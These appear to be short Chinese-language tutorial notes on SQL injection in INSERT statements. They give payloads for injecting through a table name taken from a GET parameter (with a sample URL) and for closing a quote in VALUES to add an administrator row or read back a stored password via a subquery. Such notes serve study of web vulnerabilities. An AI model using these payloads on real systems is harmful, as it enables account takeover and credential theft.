一:INSERT注入
1.注入点位于tbl_name
语句:INSERT into {$_GET['table']} values(2,2,2,2)
把密码查出来作为字段展示
http://192.168.20.132/insert.php?table=wp_user values(2,'newadmin','newpass')#
2.注入点位于VALUES
假设语句为
insert into wp_user values(1,1,’可控位置')
此时可以闭合单引号,另行插入一条记录,通常管理员和普通用户在一个表,通过表字段来控制管理员权限
insert into wp_user values(1,0,'1'),(2,1,'aaa');
如果用户表, 的第二个字段代表管理员权限识别,便能插入了,在某些情况下,我们也可以插入能回显的字段,来快速获取数据,我们假设 他最后一个可以进行输出
可以这样
insert into wp_user values(1,1,'1'),(2,2,(select pwd from wp_user limit 1 ));
